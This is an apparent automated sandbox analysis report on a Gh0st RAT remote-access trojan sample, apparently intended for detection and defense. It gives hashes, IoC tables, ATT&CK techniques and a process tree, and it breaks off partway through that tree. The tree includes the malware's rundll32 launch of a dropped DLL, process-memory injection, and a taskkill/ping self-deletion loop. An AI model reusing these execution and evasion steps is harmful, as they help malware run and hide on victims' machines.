gh0strat | 0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce

Analysis

max time kernel
150s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 17:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
Size

966KB
MD5

4bc03c18a07b850c92d833e765f119b6
SHA1

68a71fbb13bfea5f9c122b5beae439b5d2523910
SHA256

0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce
SHA512

404769902f61a1ace8554c339cc9b3e092d0372f985117167b3451975b40d437b616104bbb625c6fcd8f91665b1d442b6609abf4dcdbff3a0d29bb1c13733cca
SSDEEP

24576:HSVUz1RXA3QCUd5vHyaJ6IBrqbaO9iipSKJ53a:yiAyKaUIUEmS1

Score

10^/10

gh0strat discovery rat

Malware Config

Signatures

Gh0st RAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/1232-53-0x0000000010000000-0x0000000010042000-memory.dmp	family_gh0strat
behavioral2/memory/2832-68-0x0000000010000000-0x0000000010042000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat

Executes dropped EXE 5 IoCs

pid	Process
4824	wuauclt.exe
2080	wuauclt.exe
5024	wuauclt.exe
2428	wuauclt.exe
1064	wuauclt.exe

Loads dropped DLL 18 IoCs

pid	Process
1824	rundll32.exe
3260	rundll32.exe
1276	rundll32.exe
4824	wuauclt.exe
4824	wuauclt.exe
4824	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe
1064	wuauclt.exe
1064	wuauclt.exe
1064	wuauclt.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wuauclt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wuauclt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
956	PING.EXE
1516	PING.EXE
3688	PING.EXE
2436	PING.EXE
3492	PING.EXE
1240	PING.EXE
1852	PING.EXE
2816	PING.EXE
4432	PING.EXE
1048	PING.EXE
2136	PING.EXE
3920	PING.EXE
3532	PING.EXE
4696	PING.EXE
4520	PING.EXE
3728	PING.EXE
3064	PING.EXE
3636	PING.EXE
4880	PING.EXE
1644	PING.EXE
3536	PING.EXE
2424	PING.EXE
1524	PING.EXE
312	PING.EXE
1440	PING.EXE
1948	PING.EXE
1692	PING.EXE
4508	PING.EXE
2304	PING.EXE
1552	PING.EXE
1228	PING.EXE
2008	PING.EXE
3424	PING.EXE
4560	PING.EXE
384	PING.EXE
4032	PING.EXE
1584	PING.EXE
4596	PING.EXE
4884	PING.EXE
2344	PING.EXE
3264	PING.EXE
4868	PING.EXE
2176	PING.EXE
3532	PING.EXE
4308	PING.EXE
1172	PING.EXE
4904	PING.EXE
868	PING.EXE
3184	PING.EXE
1288	PING.EXE
2420	PING.EXE
2632	PING.EXE
4584	PING.EXE
3060	PING.EXE
4572	PING.EXE
1656	PING.EXE
5072	PING.EXE
3384	PING.EXE
4836	PING.EXE
1188	PING.EXE
3536	PING.EXE
1152	PING.EXE
2164	PING.EXE
4052	PING.EXE

Kills process with taskkill 64 IoCs

evasion

pid	Process
4992	taskkill.exe
3468	taskkill.exe
4468	taskkill.exe
212	taskkill.exe
2468	taskkill.exe
4400	taskkill.exe
3128	taskkill.exe
1320	taskkill.exe
1448	taskkill.exe
1052	taskkill.exe
2152	taskkill.exe
4436	taskkill.exe
2120	taskkill.exe
3388	taskkill.exe
4764	taskkill.exe
4136	taskkill.exe
1648	taskkill.exe
4364	taskkill.exe
2888	taskkill.exe
4536	taskkill.exe
4896	taskkill.exe
4156	taskkill.exe
2696	taskkill.exe
3116	taskkill.exe
3116	taskkill.exe
2972	taskkill.exe
4876	taskkill.exe
2320	taskkill.exe
1940	taskkill.exe
4416	taskkill.exe
1196	taskkill.exe
864	taskkill.exe
3740	taskkill.exe
4204	taskkill.exe
2116	taskkill.exe
4824	taskkill.exe
1680	taskkill.exe
756	taskkill.exe
3024	taskkill.exe
4428	taskkill.exe
4644	taskkill.exe
1092	taskkill.exe
864	taskkill.exe
3184	taskkill.exe
4828	taskkill.exe
1552	taskkill.exe
4572	taskkill.exe
4276	taskkill.exe
4752	taskkill.exe
3804	taskkill.exe
5048	taskkill.exe
3232	taskkill.exe
3892	taskkill.exe
60	taskkill.exe
1512	taskkill.exe
3772	taskkill.exe
1088	taskkill.exe
4608	taskkill.exe
1400	taskkill.exe
1376	taskkill.exe
1524	taskkill.exe
4444	taskkill.exe
4696	taskkill.exe
2372	taskkill.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
8	PING.EXE
2420	PING.EXE
1204	PING.EXE
3064	PING.EXE
3184	PING.EXE
3264	PING.EXE
1684	PING.EXE
1524	PING.EXE
2816	PING.EXE
4640	PING.EXE
1288	PING.EXE
2008	PING.EXE
4032	PING.EXE
368	PING.EXE
2176	PING.EXE
4400	PING.EXE
2164	PING.EXE
2144	PING.EXE
4880	PING.EXE
1692	PING.EXE
4508	PING.EXE
4352	PING.EXE
1644	PING.EXE
384	PING.EXE
4256	PING.EXE
1656	PING.EXE
3536	PING.EXE
4124	PING.EXE
4432	PING.EXE
3636	PING.EXE
2136	PING.EXE
2632	PING.EXE
3492	PING.EXE
4596	PING.EXE
868	PING.EXE
4904	PING.EXE
376	PING.EXE
2436	PING.EXE
1440	PING.EXE
3384	PING.EXE
3916	PING.EXE
4520	PING.EXE
956	PING.EXE
4884	PING.EXE
1048	PING.EXE
4572	PING.EXE
3728	PING.EXE
4124	PING.EXE
1152	PING.EXE
3424	PING.EXE
3472	PING.EXE
3688	PING.EXE
1852	PING.EXE
4584	PING.EXE
1516	PING.EXE
3060	PING.EXE
3168	PING.EXE
4308	PING.EXE
216	PING.EXE
5072	PING.EXE
4340	PING.EXE
432	PING.EXE
2304	PING.EXE
2344	PING.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
3260	rundll32.exe
3260	rundll32.exe
3260	rundll32.exe
3260	rundll32.exe
1276	rundll32.exe
1276	rundll32.exe
4824	wuauclt.exe
4824	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3260	rundll32.exe
Token: SeDebugPrivilege	1276	rundll32.exe
Token: SeDebugPrivilege	4824	wuauclt.exe
Token: SeDebugPrivilege	4824	wuauclt.exe
Token: SeDebugPrivilege	2080	wuauclt.exe
Token: SeDebugPrivilege	5024	wuauclt.exe
Token: SeDebugPrivilege	5024	wuauclt.exe
Token: SeDebugPrivilege	2428	wuauclt.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	3232	taskkill.exe
Token: SeDebugPrivilege	4124	taskkill.exe
Token: SeDebugPrivilege	4896	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeDebugPrivilege	212	taskkill.exe
Token: SeDebugPrivilege	3184	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	2696	taskkill.exe
Token: SeDebugPrivilege	4596	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	4136	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	3424	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4436	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	5048	taskkill.exe
Token: SeDebugPrivilege	2732	taskkill.exe
Token: SeDebugPrivilege	3232	taskkill.exe
Token: SeDebugPrivilege	4364	taskkill.exe
Token: SeDebugPrivilege	1320	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
4824	wuauclt.exe
4824	wuauclt.exe
4824	wuauclt.exe
4824	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
2080	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
5024	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe
2428	wuauclt.exe
1064	wuauclt.exe
1064	wuauclt.exe
1064	wuauclt.exe
1064	wuauclt.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 1824	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	82
PID 4424 wrote to memory of 1824	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	82
PID 4424 wrote to memory of 1824	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	82
PID 1824 wrote to memory of 3260	1824	rundll32.exe	83
PID 1824 wrote to memory of 3260	1824	rundll32.exe	83
PID 4824 wrote to memory of 2080	4824	wuauclt.exe	87
PID 4824 wrote to memory of 2080	4824	wuauclt.exe	87
PID 4824 wrote to memory of 2080	4824	wuauclt.exe	87
PID 2080 wrote to memory of 1232	2080	wuauclt.exe	88
PID 2080 wrote to memory of 1232	2080	wuauclt.exe	88
PID 2080 wrote to memory of 1232	2080	wuauclt.exe	88
PID 2080 wrote to memory of 1232	2080	wuauclt.exe	88
PID 5024 wrote to memory of 2428	5024	wuauclt.exe	90
PID 5024 wrote to memory of 2428	5024	wuauclt.exe	90
PID 5024 wrote to memory of 2428	5024	wuauclt.exe	90
PID 4424 wrote to memory of 3360	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	91
PID 4424 wrote to memory of 3360	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	91
PID 4424 wrote to memory of 3360	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	91
PID 2428 wrote to memory of 2832	2428	wuauclt.exe	92
PID 2428 wrote to memory of 2832	2428	wuauclt.exe	92
PID 2428 wrote to memory of 2832	2428	wuauclt.exe	92
PID 2428 wrote to memory of 2832	2428	wuauclt.exe	92
PID 4424 wrote to memory of 1064	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	93
PID 4424 wrote to memory of 1064	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	93
PID 4424 wrote to memory of 1064	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	93
PID 3360 wrote to memory of 3424	3360	cmd.exe	95
PID 3360 wrote to memory of 3424	3360	cmd.exe	95
PID 3360 wrote to memory of 3424	3360	cmd.exe	95
PID 4424 wrote to memory of 3044	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	96
PID 4424 wrote to memory of 3044	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	96
PID 4424 wrote to memory of 3044	4424	0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe	96
PID 3044 wrote to memory of 1684	3044	cmd.exe	98
PID 3044 wrote to memory of 1684	3044	cmd.exe	98
PID 3044 wrote to memory of 1684	3044	cmd.exe	98
PID 3360 wrote to memory of 1052	3360	cmd.exe	99
PID 3360 wrote to memory of 1052	3360	cmd.exe	99
PID 3360 wrote to memory of 1052	3360	cmd.exe	99
PID 3360 wrote to memory of 3532	3360	cmd.exe	101
PID 3360 wrote to memory of 3532	3360	cmd.exe	101
PID 3360 wrote to memory of 3532	3360	cmd.exe	101
PID 3044 wrote to memory of 3936	3044	cmd.exe	102
PID 3044 wrote to memory of 3936	3044	cmd.exe	102
PID 3044 wrote to memory of 3936	3044	cmd.exe	102
PID 3044 wrote to memory of 3536	3044	cmd.exe	103
PID 3044 wrote to memory of 3536	3044	cmd.exe	103
PID 3044 wrote to memory of 3536	3044	cmd.exe	103
PID 3360 wrote to memory of 1396	3360	cmd.exe	104
PID 3360 wrote to memory of 1396	3360	cmd.exe	104
PID 3360 wrote to memory of 1396	3360	cmd.exe	104
PID 3360 wrote to memory of 2424	3360	cmd.exe	105
PID 3360 wrote to memory of 2424	3360	cmd.exe	105
PID 3360 wrote to memory of 2424	3360	cmd.exe	105
PID 3044 wrote to memory of 3116	3044	cmd.exe	106
PID 3044 wrote to memory of 3116	3044	cmd.exe	106
PID 3044 wrote to memory of 3116	3044	cmd.exe	106
PID 3044 wrote to memory of 8	3044	cmd.exe	107
PID 3044 wrote to memory of 8	3044	cmd.exe	107
PID 3044 wrote to memory of 8	3044	cmd.exe	107
PID 3360 wrote to memory of 3024	3360	cmd.exe	111
PID 3360 wrote to memory of 3024	3360	cmd.exe	111
PID 3360 wrote to memory of 3024	3360	cmd.exe	111
PID 3360 wrote to memory of 1524	3360	cmd.exe	112
PID 3360 wrote to memory of 1524	3360	cmd.exe	112
PID 3360 wrote to memory of 1524	3360	cmd.exe	112

C:\Users\Admin\AppData\Local\Temp\0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe
"C:\Users\Admin\AppData\Local\Temp\0db3f06e287e53fc06f6392cd441b79c57a936860ed2cec462d9f12f186b59ce.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\ProgramData\IMEJP10\Mshype.dll",Process32First
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Windows\system32\rundll32.exe
    rundll32.exe "C:\ProgramData\IMEJP10\Mshype.dll",Process32First
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\del.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3424
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3532
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1524
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2164
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1240
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:384
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:212
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2420
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:312
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3916
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:1204
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3532
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3116
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:784
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4644
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4836
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1552
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
